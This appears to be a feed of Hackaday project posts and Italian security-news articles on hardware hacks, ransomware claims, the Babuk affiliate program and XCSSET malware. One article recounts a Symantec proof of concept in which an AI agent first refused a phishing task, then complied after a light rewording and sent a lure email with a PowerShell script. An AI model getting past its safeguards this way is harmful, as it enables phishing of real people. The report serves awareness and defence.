Building a Fully Automatic Birkeland-Eyde Reactor
Ever wanted to produce nitrogen fertilizer like they did in the 1900s? In that case, you’re probably looking at the Birkeland-Eyde process, which was the first industrial-scale atmospheric nitrogen fixation process. It was eventually replaced by the Haber-Bosch and Ostwald processes. [Markus Bindhammer] covers the construction of a hobbyist-sized, fully automated reactor in this video.
It uses tungsten electrodes to produce the requisite arc, with a copper rod brazed onto both. The frame is made of aluminium profiles mounted on a polypropylene board, supporting the reaction vessel. Powering the whole contraption is a 24 VDC, 20 A power supply, which powers the flyback transformer for the high-voltage arc, as well as an air pump and smaller electronics, including the Arduino Uno board controlling the system.
The air is dried by silica gel before entering the reactor, with the airflow measured by a mass air flow sensor and the reaction temperature by a temperature sensor. This should give the MCU a full picture of the state of the reaction, with the airflow having to be sufficiently high relative to the arc to extract the maximum yield for this already very low-yield (single-digit %) process.
Usually, we are more interested in getting our nitrogen in liquid form. We’ve also looked at the Haber-Bosch method in the past.
youtube.com/embed/L9KpFKQ7brY?…
Add WebUSB Support To Firefox With a Special USB Device
The WebUSB standard is certainly controversial. Many consider it a security risk, and, to date, only Chromium-based browsers support it. But there is a workaround that is, ironically, supposed to increase security. The adjacent Universal 2nd Factor (U2F) standard also adds (limited) USB support to browsers. Sure, this is meant solely to support U2F USB dongles for two-factor authentication purposes, but as [ArcaneNibble] demonstrates using U2F-compatible firmware on a Raspberry Pi RP2040, by hijacking the U2F payload, this API can be used to provide WebUSB-like functionality.
The provided demo involves flashing an RP2040 (e.g., Pico board) with the u2f-hax.u2f firmware and loading the index.html page from localhost or a similar secure context. After this, the buttons on the browser page can be used to toggle an LED on the Pico board on or off. You can also read an input back from the RP2040.
This feat is made possible by the opaque nature of the U2F key handle, which means that anything can be put in this blob. This makes it a snap to pass data from the U2F dongle to the host. For the inverse, things get a bit trickier. Here the ECDSA signature is manipulated inside the ASN.1 that is returned to the dongle. Since Firefox performs no signature validation (and Chrome only does a range check), this works. The MCU also auto-confirms user presence by having the key handle start with oxfeedface, so the device works without user interaction. However, you do seem to get an annoying popup that immediately goes away.
Of course, this only works if you create a special USB device for this purpose. That means your normal USB devices are still secure. While we know it could be a security risk, you can do some cool things with WebUSB. We’ve seen a few projects that use it.
You Too Can Do the Franck-Hertz Experiment
We talk about quantum states — that is, something can be at one of several discrete values but not in between. For example, a binary digit can be a 1 or a 0, but not 0.3 or 0.5. Atoms have quantum states, but how do we know that? That’s what the Franck-Hertz experiment demonstrates, and [stoppi] shows you how to replicate that famous experiment yourself.
You might need to translate the web page if your German isn’t up to speed, but there’s also a video you can watch below. The basic idea is simple. A gas-filled tube sees a large voltage across the cathode and grid. A smaller voltage connects to the grid and anode. If you increase the grid voltage, you might expect the anode current to increase linearly. However, that doesn’t happen. Instead, you’ll observe dips in the anode current.
When electrons reach a certain energy they excite the gas in the tube. This robs them of the energy they need to overcome the grid/anode voltage, which explains the dips. As the energy increases, the current will again start to rise until it manages to excite the gas to the next quantum level, at which point another dip will occur.
Why not build a whole lab? Quantum stuff, at a certain level, is weird, but this experiment seems understandable enough.
youtube.com/embed/St-EJRtIsHg?…
Putting Conductive TPU To The Test
Ever pried apart an LCD? If so, you’ve likely stumbled at the unassuming zebra strip — the pliable connector that makes bridging PCB pads to glass traces look effortless. [Chuck] recently set out to test if he could hack together his own zebra strip using conductive TPU and a 3D printer.
[Chuck] started by printing alternating bands of conductive and non-conductive TPU, aiming to mimic the compressible, striped conductor. Despite careful tuning and slow prints, the results were mixed to say the least. The conductive TPU measured a whopping 16 megaohms, barely touching the definition of conductivity! LEDs stayed dark, multimeters sulked, and frustration mounted. Not one to give up, [Chuck] took to his trusty Proto-pasta conductive PLA, and got bright, blinky success. It left no room for flexibility, though.
It would appear that conductive TPU still isn’t quite ready for prime time in fine-pitch interconnects. But if you find a better filament – or fancy prototyping your own zebra strip – jump in! We’d love to hear about your attempts in the comments.
youtube.com/embed/kwZItuntksc?…
Gli hacker criminali di Orca Ransomware rivendicano un attacco informatico all’italiana Casale Del Giglio
Nella giornata di ieri, la banda di criminali informatici di Orca Ransomware rivendica all’interno del proprio Data Leak Site (DLS) un attacco ransomware all’italiana Casale Del Giglio.
Nel post pubblicato nelle underground dai criminali informatici viene riportato che la gang è in possesso di 253GB di dati, esfiltrati dalle infrastrutture IT dell’azienda. per un totale di oltre 300.000 files.
Sul sito della gang è attivo anche un countdown che mostra che tra 5gg, ci sarà un aggiornamento del post. Sicuramente la gang in quella data potrà pubblicare una parte dei dati in loro possesso per aumentare la pressione sulla vittima.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
I criminali informatici, per poter attestare che l’accesso alle infrastrutture informatiche è avvenuto con successo, riportano una serie di documenti (samples) afferenti all’azienda.
Questo modo di agire – come sanno i lettori di RHC – generalmente avviene quando ancora non è stato definito un accordo per il pagamento del riscatto richiesto da parte dei criminali informatici. In questo modo, i criminali minacciando la pubblicazione dei dati in loro possesso, aumenta la pressione verso l’organizzazione violata, sperando che il pagamento avvenga più velocemente.
Come spesso riportiamo, l’accesso alle Darknet è praticabile da qualsiasi persona che sappia utilizzare normalmente un PC. Questo è importante sottolinearlo in quanto molti sostengono il contrario, spesso nei comunicati dopo la pubblicazione dei dati delle cybergang ransomware e tali informazioni sono pubblicamente consultabili come fonti aperte.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
Cos’è il ransomware as a service (RaaS)
Il ransomware, è una tipologia di malware che viene inoculato all’interno di una organizzazione, per poter cifrare i dati e rendere indisponibili i sistemi. Una volta cifrati i dati, i criminali chiedono alla vittima il pagamento di un riscatto, da pagare in criptovalute, per poterli decifrare.
Qualora la vittima non voglia pagare il riscatto, i criminali procederanno con la doppia estorsione, ovvero la minaccia della pubblicazione di dati sensibili precedentemente esfiltrati dalle infrastrutture IT della vittima.
Per comprendere meglio il funzionamento delle organizzazioni criminali all’interno del business del ransomware as a service (RaaS), vi rimandiamo a questi articoli:
- Il ransomware cos’è. Scopriamo il funzionamento della RaaS
- Perché l’Italia è al terzo posto negli attacchi ransomware
- Difficoltà di attribuzione di un attacco informatico e false flag
- Alla scoperta del gruppo Ransomware Lockbit 2.0
- Intervista al rappresentante di LockBit 2.0
- Il 2021 è stato un anno difficile sul piano degli incidenti informatici
- Alla scoperta del gruppo Ransomware Darkside
- Intervista al portavoce di Revil UNKNOW, sul forum XSS
- Intervista al portavoce di BlackMatter
Come proteggersi dal ransomware
Le infezioni da ransomware possono essere devastanti per un’organizzazione e il ripristino dei dati può essere un processo difficile e laborioso che richiede operatori altamente specializzati per un recupero affidabile, e anche se in assenza di un backup dei dati, sono molte le volte che il ripristino non ha avuto successo.
Infatti, si consiglia agli utenti e agli amministratori di adottare delle misure di sicurezza preventive per proteggere le proprie reti dalle infezioni da ransomware e sono in ordine di complessità:
- Formare il personale attraverso corsi di Awareness;
- Utilizzare un piano di backup e ripristino dei dati per tutte le informazioni critiche. Eseguire e testare backup regolari per limitare l’impatto della perdita di dati o del sistema e per accelerare il processo di ripristino. Da tenere presente che anche i backup connessi alla rete possono essere influenzati dal ransomware. I backup critici devono essere isolati dalla rete per una protezione ottimale;
- Mantenere il sistema operativo e tutto il software sempre aggiornato con le patch più recenti. Le applicazioni ei sistemi operativi vulnerabili sono l’obiettivo della maggior parte degli attacchi. Garantire che questi siano corretti con gli ultimi aggiornamenti riduce notevolmente il numero di punti di ingresso sfruttabili a disposizione di un utente malintenzionato;
- Mantenere aggiornato il software antivirus ed eseguire la scansione di tutto il software scaricato da Internet prima dell’esecuzione;
- Limitare la capacità degli utenti (autorizzazioni) di installare ed eseguire applicazioni software indesiderate e applicare il principio del “privilegio minimo” a tutti i sistemi e servizi. La limitazione di questi privilegi può impedire l’esecuzione del malware o limitarne la capacità di diffondersi attraverso la rete;
- Evitare di abilitare le macro dagli allegati di posta elettronica. Se un utente apre l’allegato e abilita le macro, il codice incorporato eseguirà il malware sul computer;
- Non seguire i collegamenti Web non richiesti nelle e-mail;
- Esporre le connessione Remote Desktop Protocol (RDP) mai direttamente su internet. Qualora si ha necessità di un accesso da internet, il tutto deve essere mediato da una VPN;
- Implementare sistemi di Intrusion Prevention System (IPS) e Web Application Firewall (WAF) come protezione perimetrale a ridosso dei servizi esposti su internet.
- Implementare una piattaforma di sicurezza XDR, nativamente automatizzata, possibilmente supportata da un servizio MDR 24 ore su 24, 7 giorni su 7, consentendo di raggiungere una protezione e una visibilità completa ed efficace su endpoint, utenti, reti e applicazioni, indipendentemente dalle risorse, dalle dimensioni del team o dalle competenze, fornendo altresì rilevamento, correlazione, analisi e risposta automatizzate.
Sia gli individui che le organizzazioni sono scoraggiati dal pagare il riscatto, in quanto anche dopo il pagamento le cyber gang possono non rilasciare la chiave di decrittazione oppure le operazioni di ripristino possono subire degli errori e delle inconsistenze.
La sicurezza informatica è una cosa seria e oggi può minare profondamente il business di una azienda.
Oggi occorre cambiare immediatamente mentalità e pensare alla cybersecurity come una parte integrante del business e non pensarci solo dopo che è avvenuto un incidente di sicurezza informatica.
L'articolo Gli hacker criminali di Orca Ransomware rivendicano un attacco informatico all’italiana Casale Del Giglio proviene da il blog della sicurezza informatica.
My Scammer Girlfriend: Baiting a Romance Fraudster
Nobody likes spam messages, but some of them contain rather fascinating scams. Case in point, [Ben Tasker] recently got a few romance scam emails that made him decide to take a poke at the scam behind these messages. This particular scam tries to draw in marks with an attached photo (pilfered from Facebook) and fake personal details. Naturally, contacting scammers is a bad idea, and you should never provide them with any personal information if you decide to have some ‘fun’.
The games begin once you contact them via the listed email address, as they’re all sent from hacked/spoofed email accounts. After this you have to wait for the scammers to return to the campaign on their monthly cycle, so give it a few weeks. Analyzing image metadata provides some clues (e.g. the FBMD prefix in IPTC tags set by Meta, as well as timezone info). The IP address from the email headers pointed to a VPN being used, so no easy solution here.
After establishing contact, the scammers try to coax the mark into ‘helping’ them move to their country, with Skype out-call numbers received on [Ben]’s burner phone that seem designed to add to the realism. Then ‘disaster’ strikes and the mark is asked to transfer a lot of money to help their new ‘love’. Naturally, [Ben] wasn’t a gullible mark, and set up a few traps, including a custom domain and website that’d log any visitor (i.e. the scammer).
The breakthrough came when following a similar scam email that came in, with the scammers having seemingly forgotten to turn on their VPN, as this time the email headers pointed to an IP address of a Russian ISP.
Ultimately this sleuthing mostly reveals the depressing truth about these scams, in that the scammers will readily make up sob stories and pilfer people’s images from social media, all to find a few susceptible marks within the probably thousands if not millions who get sent these scam mails. The crude sophistry displayed in [Ben]’s article when it comes to photoshopping visas, passports, etc. tends to be still enough to convince those who want to believe that their soulmate just messaged them out of the blue.
As much as we’d like there to be a technological solution to scams, this is one area where only careful human ‘programming’ can help, and thus why educating everyone on the hazards of the Internet is so essential.
Hackaday Europe 2025: Streaming Live
Hackaday Europe 2025 is in full swing, and whether you’re experiencing it live in Berlin or following along from home, here’s where you’ll find all the info you need to get the most out of it.
Event Page: hackaday.io/europe2025
Chat: Hackaday Discord (Channels: europe-2025 / badge-hacking)
Talk Streams: youtube.com/@hackaday/streams
Open AI Esegue Attacchi di Phishing Autonomi! Scopri di cosa si tratta
I ricercatori di sicurezza Symantec hanno dimostrato come utilizzare lo strumento Operator Agent di OpenAI per eseguire attacchi di rete con richieste minime. Questa ricerca rivela possibili tendenze di sviluppo futuro.
Symantec ha pubblicato la proof-of-concept sul suo blog di ricerca. L’azienda ha osservato che finora l’uso di modelli di grandi dimensioni da parte degli aggressori è stato per lo più passivo. Ad esempio, i modelli di grandi dimensioni possono essere utilizzati per generare e-mail di phishing altamente realistiche, assistere nella scrittura di codice di base e persino supportare determinate attività di ricerca.
Tuttavia, con l’avvento degli agenti di intelligenza artificiale generativa, questi agenti sono diventati in grado di svolgere attività proattive, come l’interazione con le pagine web. Questa capacità avanzata non solo facilita gli utenti legittimi, ma può anche dare agli aggressori una maggiore possibilità di commettere atti dannosi .
Attacchi di phishing automatizzati
In questo esperimento, i ricercatori Symantec hanno utilizzato il nuovo Operator Agent di OpenAI. I ricercatori hanno chiesto all’agente AI di svolgere i seguenti compiti: identificare una persona che ricopre una posizione specifica presso Symantec; trovare l’indirizzo e-mail della persona; generare uno script di PowerShell che può essere utilizzato per raccogliere informazioni dal sistema della vittima; e scrivere una “e-mail esca persuasiva e inviare lo script alla persona sopra menzionata” .
La prima parola richiesta immessa non ha avuto successo perché l’agent OpenAI Operator ha avvertito: “Ciò comporta l’invio di e-mail indesiderate e potrebbe riguardare informazioni sensibili, che potrebbero violare le norme sulla privacy e sulla sicurezza”. Tuttavia, quando i ricercatori hanno leggermente modificato la parola richiesta per farla sembrare una richiesta autorizzata, l’agent AI ha accettato l’attività.
L’agent ha trovato il nome di O’Brien basandosi esclusivamente sulla sua qualifica professionale e poi è riuscito a dedurre l’indirizzo e-mail di lavoro di O’Brien (sebbene il suo indirizzo e-mail non sia pubblico) deducendo il formato dell’indirizzo e-mail di Broadcom (Nota: la società madre di Symantec). Ha quindi redatto uno script PowerShell.
“Dopo aver ottenuto l’indirizzo e-mail, l’agent ha scritto uno script PowerShell per trovare e installare un plugin di editor di testo correlato a Google Drive”, si legge nel post del blog. “Per questa dimostrazione, è stato utilizzato un account Google creato appositamente con il nome visualizzato impostato su ‘Supporto IT’. In particolare, prima di scrivere lo script, l’agente Operator ha visitato attivamente diverse pagine web relative a PowerShell, apparentemente alla ricerca di indicazioni su come scrivere lo script.”
Alla fine, l’agente AI ha generato una “email di phishing abbastanza convincente” che ha ingannato O’Brien, inducendolo a eseguire uno script PowerShell e ad allegarlo all’email. Inoltre, l’agente ha inviato l’email senza chiedere alcuna autorizzazione aggiuntiva.
Uno sguardo al futuro
Sebbene strumenti di modelli di grandi dimensioni come ChatGPT abbiano aggiunto una serie di protezioni di sicurezza per rendere più difficile l’implementazione di prompt engineering dannosi, O’Brien ha sottolineato in un’intervista che quando si utilizzano agenti di intelligenza artificiale, gli utenti possono effettivamente osservare le loro operazioni in tempo reale e indirizzare il loro comportamento in linguaggio naturale.
“Se l’agente AI incontra una certa protezione di sicurezza, l’utente può intervenire manualmente per aggirare le restrizioni e quindi restituire il controllo all’agente AI”, ha affermato. “Ciò solleva un nuovo problema: le misure di protezione dell’agente AI limitano solo il suo comportamento, ma non possono controllare le azioni dell’utente”.
È interessante notare che l’attacco nella proof-of-concept di Symantec ha richiesto poca o nessuna progettazione complessa. “Lo scopo principale dell’ingegneria dei suggerimenti è aggirare le misure di sicurezza e impedire all’agente AI di commettere errori stupidi”, ha spiegato O’Brien. “Naturalmente, se dedicassimo più tempo alla progettazione attenta delle parole chiave, potremmo riuscire a elaborare tecniche di attacco più complesse, ma non è questo lo scopo di questo studio.”
La conclusione principale che si può trarre da questa ricerca per chi si occupa della difesa delle reti è che, sebbene gli agenti di intelligenza artificiale non siano ancora ampiamente utilizzati dagli aggressori per condurre attacchi avanzati, questa tendenza è motivo di preoccupazione.
L'articolo Open AI Esegue Attacchi di Phishing Autonomi! Scopri di cosa si tratta proviene da il blog della sicurezza informatica.
Maxi fuga di dati: Empire rivendica l’estrazione di 3,1 milioni di record da Honda Cars
Un hacker noto come “Empire” avrebbe messo in vendita sul noto forum underground Breach Forums un database contenente 3.176.958 record appartenenti a Honda Cars India Ltd. Secondo quanto riportato, i dati trapelati includono informazioni sensibili sui clienti, come nomi, alias, indirizzi, ID cliente, numeri di cellulare e indirizzi e-mail.
La violazione, qualora confermata, che si presume sia avvenuta nel marzo 2025, rappresenta un altro grave incidente di sicurezza informatica nel settore automobilistico.
L’autore dell’attacco ha dichiarato sul forum di possedere registri dettagliati, con 2.866.348 numeri di telefono e 1.907.053 indirizzi e-mail tra i dati compromessi. Per dimostrare la veridicità della sua affermazione, ha condiviso un campione delle informazioni sottratte.
Al momento, Honda Cars India non ha rilasciato una dichiarazione ufficiale sull’accaduto, ma la natura e la quantità dei dati esposti potrebbero avere serie conseguenze per i clienti colpiti, tra cui possibili truffe di phishing e furti di identità.
Non è la prima volta che Honda affronta problemi di sicurezza informatica. L’industria automobilistica è sempre più dipendente da sistemi digitali e connessi, sta diventando una delle principali vittime della criminalità informatica.
Gli esperti di cybersecurity sottolineano la necessità di rafforzare le difese contro queste minacce, adottando misure avanzate come Security Operations Center (vSOC) basati sull’intelligenza artificiale. Le aziende devono investire nella protezione dei dati sensibili e i clienti sono invitati a monitorare le proprie informazioni per eventuali attività sospette. Con l’aumento delle violazioni nel settore automobilistico, diventa essenziale implementare strategie di sicurezza più robuste e normative più stringenti per contrastare le minacce emergenti.
L'articolo Maxi fuga di dati: Empire rivendica l’estrazione di 3,1 milioni di record da Honda Cars proviene da il blog della sicurezza informatica.
Probably The Simplest Sequencing Synth
With inexpensive microntrollers capable of the most impressive feats of sound synthesis, it’s not so often we see projects that return to an earlier style of electronic music project. The 1-bit synth from [Electroagenda] takes us firmly into that territory, employing that most trusty of circuits, a 555.
It’s a time-honored circuit, a 555 provides a note clock that drives a 4017 that functions as a sequencer. This switches in a set of voltage dividers, which in turn control another 555 oscillator that produces the notes. It’s a fun toy straight from the 1970s, right down to the protoboard and hookup wire construction. There’s a demo video with some lovely beeps below, and we think most of you should have what it takes to make your own.
If you’re seeking more inspiration, may we introduce you to our Logic Noise series?
youtube.com/embed/OFlzEARGcgg?…
Make Your Cheap Thermal Camera into a Microscope
[Project 326] has a cheap thermal camera that plugs into a smart phone. Sure they are handy, but what if you could hack one into a microscope with a resolution measured in microns? It is easier than you might think and you can see how in the video below.
Of course, microscopes need lenses, but glass doesn’t usually pass IR very well. This calls for lenses made of exotic material like germanium. One germanium lens gives some magnification. However, using a 3D printed holder, three lenses are in play, and the results are impressive.
The resolution is good enough to see the turns of wire in an incandescent light bulb. A decapsulated power transistor was interesting to view, too. Imaging heat at that much resolution gives you a lot of information. At the end, he teases that using first surface mirrors, he may show how to build an IR telescope as well.
Presumably, this will work with just about any IR camera if you adapt the lens holder. The unit in the video is a UNI-T UTi-260M. So when he says he spent about $35 on the build, that’s not including the $400 or so camera module.
IR imaging can pull off some amazing tricks, like looking inside an IC. If the thermal camera used in the video isn’t to your liking, there are plenty of others out there.
youtube.com/embed/W5DLgJyDzIk?…
Building a Ten-Hundred Key Computer Word-Giving Thing
From the styling of this article’s title, some might assume that the Hackaday editors are asleep at the switch this fine day. While that might be true — it’s not our turn to watch them — others will recognize this tortured phrasing as one way to use the 1,000 most commonly used words in the English language to describe a difficult technical project, such as [Attoparsec]’s enormous and enormously impractical ten-hundred word keyboard.
While the scale of this build is overwhelming enough, the fact that each key delivers a full word rather than a single character kind of throws the whole keyboard concept out the window. The 60×17 matrix supports the 1,000 most common English words along with 20 modifier keys, which allow a little bit of cheating on the 1-kiloword dictionary by letting you pluralize a word or turn it into an adjective or adverb. Added complexity comes from the practical limits of PCB fabrication, which forces the use of smaller (but still quite large) PCBs that are connected together. Luckily, [Attoparsec] was able to fit the whole thing on five identical PCBs, which were linked together with card-edge connectors.
The list of pain points on this six-month project is long, and the video below covers them all in detail. What really stood out to us, though, was the effort [Attoparsec] put into the keycaps. Rather than 3D printing his own, he used dye sublimation to label blank keycaps with the 1,000 words. That might sound simple, but he had to go through a lot of trial and error before getting a process that worked, and the results are quite nice. Another problem was keeping the key switches aligned while soldering, which was solved with a 3D printed jig. We also appreciate the custom case to keep this keyboard intact while traveling; we’re going to keep that build-your-own road case service in mind for future projects.
This mega-keyboard is a significant escalation from [Attoparsec]’s previous large keyboard project. The results are pretty ridiculous and impractical, but that’s just making us love it more. The abundance of tips and tricks for managing a physically expansive project are just icing on the cake.
youtube.com/embed/wC-24QeoQu4?…
C+P: Combining the Usefulness of C with the Excellence of Prolog
In a move that will absolutely not over-excite anyone, nor lead to any heated arguments, [needleful] posits that their C Plus Prolog (C+P for short) programming language is the best possible language ever. This is due to it combining the best of the only good programming language (Prolog) with the best of the only useful programming language (C). Although the resulting mash-up syntax that results may trigger Objective-C flashbacks, it’s actually valid SWI-Prolog, that is subsequently converted to C for compilation.
Language flamewars aside, the motivation for C+P as explained in the project’s README was mostly the exploring of macros in a system programming language. More specifically, by implementing a language-within-a-language you can add just about any compile-time feature you want including – as demonstrated in C+P – a form of generics. Even as a way to have a bit of fun, C+P comes dangerously close to being a functional prototype. Its main flaw is probably the lack of validation and error messages, which likely leads to broken C being generated.
Also mentioned are the Nim and Haxe languages which can be compiled (transpiled) to C or C++, which is somewhat of a similar idea as C+P, as well as cmacro (based on Common Lisp) and the D language.
Babuk Locker 2.0: annuncia il nuovo programma di affiliazione ransomware
Babuk, uno dei gruppi ransomware più noti nel panorama del cybercrimine, ha lanciato il Babuk Locker 2.0 Affiliate Program 2025, un programma di affiliazione per hacker esperti che vogliono guadagnare con attacchi ransomware. Questo programma, pubblicato nel loro dataleak site, introduce nuove funzionalità avanzate e un modello più strutturato per chi vuole unirsi alla loro rete criminale.
Come funziona il programma
Babuk Locker 2.0 accetta affiliati da tutto il mondo, senza distinzione di lingua o provenienza, a patto che abbiano esperienza nel penetration testing e nella compromissione di sistemi informatici. Il loro obiettivo è chiaro: massimizzare i guadagni con attacchi mirati e gestire i riscatti in modo più efficace. La piattaforma permette agli affiliati di gestire in autonomia le comunicazioni con le vittime e le operazioni di estorsione.
Le novità della piattaforma
La nuova versione del Babuk Locker introduce diverse funzionalità per semplificare le operazioni dei cybercriminali, tra cui:
- Pannello di controllo su Tor: un’interfaccia per gestire gli attacchi e negoziare i riscatti.
- Chat con le vittime: sistema di messaggistica con notifiche e trasferimento file.
- Verifica della decrittazione: possibilità di dimostrare alle vittime che il ransomware può effettivamente ripristinare i file.
- Babuk Stealer: modulo per rubare dati prima della crittografia.
- Upload automatico dei dati: gli affiliati possono caricare le informazioni rubate direttamente sul blog del gruppo.
- Scanner di rete: per individuare risorse condivise nella rete della vittima.
- Distribuzione automatica del ransomware: il malware si diffonde senza bisogno di script o configurazioni avanzate.
Quanto guadagnano gli affiliati
Babuk Locker 2.0 prevede una commissione fissa del 10% sui riscatti ricevuti dagli affiliati. Ogni affiliato può negoziare direttamente con la vittima e trasferire successivamente la percentuale dovuta al gruppo Babuk. Per garantire la serietà dei partecipanti, il programma richiede un deposito iniziale di 25.000 USD in Bitcoin, una strategia che serve a escludere infiltrati delle forze dell’ordine o investigatori sotto copertura.
Chi può essere attaccato e chi no
Babuk ha stabilito alcune regole sugli obiettivi da colpire:
- Divieto di attacchi a infrastrutture critiche: centrali nucleari, ospedali pubblici e organizzazioni post-sovietiche sono off-limits.
- Obiettivi permessi: aziende private, istituzioni educative a scopo di lucro, case farmaceutiche e cliniche estetiche.
- Attacchi incoraggiati: forze di polizia e agenzie governative impegnate nella lotta ai cybercriminali.
Conclusione
Il Babuk Locker 2.0 Affiliate Program 2025 dimostra quanto il modello ransomware stia diventando sofisticato e organizzato. Con strumenti sempre più avanzati e una gestione diretta delle negoziazioni, il gruppo Babuk si posiziona come uno dei più pericolosi attori del panorama cybercriminale. Per le aziende, rimanere vigili e rafforzare le misure di sicurezza è l’unica strada per contrastare queste minacce sempre più aggressive.
L'articolo Babuk Locker 2.0: annuncia il nuovo programma di affiliazione ransomware proviene da il blog della sicurezza informatica.
XCSSET: Il malware invisibile che minaccia gli sviluppatori macOS
Microsoft Threat Intelligence ha recentemente scoperto una nuova variante di XCSSET, un malware sofisticato progettato per infettare i progetti Xcode su macOS. Questa versione aggiornata introduce miglioramenti significativi nell’offuscamento del codice, nelle tecniche di persistenza e nelle strategie di infezione, aumentando la capacità del malware di eludere i controlli di sicurezza e compromettere i sistemi degli sviluppatori. La minaccia si presenta particolarmente pericolosa a causa della sua natura modulare e della capacità di esfiltrare informazioni sensibili, inclusi file personali, credenziali e persino dati relativi a portafogli digitali.
Una minaccia persistente e in evoluzione
XCSSET è stato inizialmente individuato nel 2020 come un malware capace di infettare progetti Xcode, colpendo gli sviluppatori macOS in modo subdolo. La sua strategia di attacco prevedeva la modifica dei file associati ai progetti di sviluppo, diffondendosi automaticamente agli utenti che scaricavano e compilavano il codice infetto.
La nuova variante, la prima rilevata dal 2022, presenta caratteristiche avanzate rispetto alle precedenti versioni. Oltre a implementare tecniche di offuscamento più raffinate, il malware utilizza nuovi meccanismi di persistenza, il che gli permette di rimanere attivo anche dopo il riavvio del sistema. Inoltre, è stata osservata una maggiore modularità del codice, il che suggerisce che gli autori di XCSSET abbiano sviluppato un framework scalabile per distribuire payload malevoli personalizzati.
Analisi della struttura dell’attacco: interpretazione dell’immagine allegata
L’immagine allegata fornisce una rappresentazione visiva della complessa infrastruttura di XCSSET, evidenziando i suoi molteplici punti di contatto e interconnessioni con moduli malevoli, server di comando e controllo (C2) e metodi di infezione.
- Nucleo centrale (XCSSET): Al centro della mappa si trova il nodo principale, che rappresenta il malware XCSSET, da cui si diramano le connessioni verso varie componenti e meccanismi di attacco.
- Connessioni ai server C2: Le linee che si estendono verso destra collegano XCSSET a numerosi domini dannosi e server di comando e controllo. Questi server fungono da centri di gestione per il malware, consentendo agli attaccanti di inviare comandi, aggiornare i moduli malevoli e raccogliere dati rubati.
- Metodi di persistenza e infezione: Le connessioni sulla sinistra illustrano le tecniche di persistenza utilizzate da XCSSET, come la modifica dei file di configurazione della shell (zshrc), la compromissione delle build di Xcode e l’abuso di strumenti legittimi per garantirne la sopravvivenza nel sistema infetto.
- Target e vettori di attacco: Nella parte destra dell’immagine emergono numerosi obiettivi e moduli infettati, suggerendo una strategia di attacco altamente scalabile, in grado di colpire sviluppatori macOS in tutto il mondo. La presenza di più moduli dimostra la natura modulare del malware e la capacità degli attaccanti di aggiornarlo con nuove funzionalità.
L’analisi dell’immagine evidenzia l’architettura sofisticata di XCSSET e il modo in cui riesce a distribuire le proprie componenti in modo efficace, rendendo la sua individuazione e rimozione estremamente complessa.
Tecniche avanzate di offuscamento e struttura modulare
Uno degli aspetti più insidiosi di questa nuova variante è l’adozione di un sistema di offuscamento più sofisticato. I nomi dei moduli sono stati mascherati per rendere più difficile l’analisi statica, mentre l’uso intensivo di linguaggi di scripting e binari legittimi consente al malware di operare in modo discreto.
La struttura modulare del malware permette agli attaccanti di aggiornare le funzionalità senza dover distribuire una nuova versione completa, aumentando la flessibilità e la longevità della minaccia. Tra le capacità identificate troviamo:
- Decodifica e esecuzione di payload offuscati per evitare il rilevamento da parte degli antivirus.
- Uso esteso di comandi UNIX per garantire compatibilità con i sistemi macOS.
- Sfruttamento di strumenti legittimi per l’esecuzione del codice malevolo, riducendo il rischio di essere individuato dagli strumenti di sicurezza.
Tecniche di persistenza migliorate
Per garantire la sopravvivenza nel sistema infetto, XCSSET implementa tre diverse tecniche di persistenza:
- Modifica del file di configurazione della shell Zsh (metodo “zshrc”): Il malware inietta codice malevolo nel file di configurazione della shell, facendo sì che venga eseguito automaticamente ogni volta che un utente apre una nuova sessione terminale.
- Abuso dello strumento DockUtil (metodo “dock”): XCSSET scarica e utilizza DockUtil, uno strumento firmato legittimamente, per modificare le impostazioni del Dock di macOS. Viene creata un’applicazione falsa con il nome di Launchpad, che esegue sia la versione autentica dell’applicazione che il malware.
- Infezione del processo Git (metodo “git”): Il codice malevolo viene iniettato nei flussi di lavoro Git, assicurando che il malware venga eseguito durante le operazioni di commit.
Conclusione e misure di mitigazione
L’evoluzione di XCSSET dimostra come le minacce informatiche siano in costante cambiamento, adottando nuove strategie per eludere i controlli di sicurezza. Per mitigare i rischi associati a questa minaccia, gli sviluppatori dovrebbero adottare le seguenti precauzioni:
- Verificare sempre l’integrità dei progetti Xcode prima di compilarli.
- Utilizzare strumenti di sicurezza aggiornati per identificare eventuali anomalie.
- Monitorare il traffico di rete per individuare comunicazioni sospette con server C2.
- Limitare l’uso di script non verificati all’interno dei progetti di sviluppo.
L’analisi condotta da Microsoft Threat Intelligence sottolinea l’importanza di mantenere elevati livelli di sicurezza informatica, soprattutto in ambienti di sviluppo. Gli sviluppatori macOS devono essere consapevoli delle minacce emergenti e adottare misure proattive per proteggere il proprio codice e i propri sistemi da attacchi sofisticati come XCSSET.
L'articolo XCSSET: Il malware invisibile che minaccia gli sviluppatori macOS proviene da il blog della sicurezza informatica.
Pi Hand is a Digital Display of a Different Sort
Hackers enjoy a good theme, and so it comes as no surprise that every time March 14th (Pi Day) rolls around, the tip line sees an uptick in mathematical activity. Whether it’s something they personally did or some other person’s project they want to bring to our attention, a lot of folks out there are very excited about numbers today.
One of our most prolific circumference aficionados is [Cristiano Monteiro], who, for the last several years, has put together a special project to commemorate the date. For 2025, he’s come up with a robotic hand that will use its fingers to show the digits of Pi one at a time. Since there’s only one hand, anything higher than five will be displayed as two gestures in quick succession, necessitating a bit of addition on the viewer’s part.
To that end, each one is attached to an MG90 servo, which an Arduino Nano drives with attached Servo Shield. From there, it’s just a matter of code to get the digits wiggling out the correct value, which [Cristiano] has kindly shared for anyone looking to recreate this project.
If you’re hungry for more Pi, the ghostly display that [Cristiano] sent in last year is definitely worth another look. While not directly related to today’s mathematical festivities, the portable GPS time server he put together back in 2021 is another fantastic build you should check out.
youtube.com/embed/zKS8LcoMIho?…
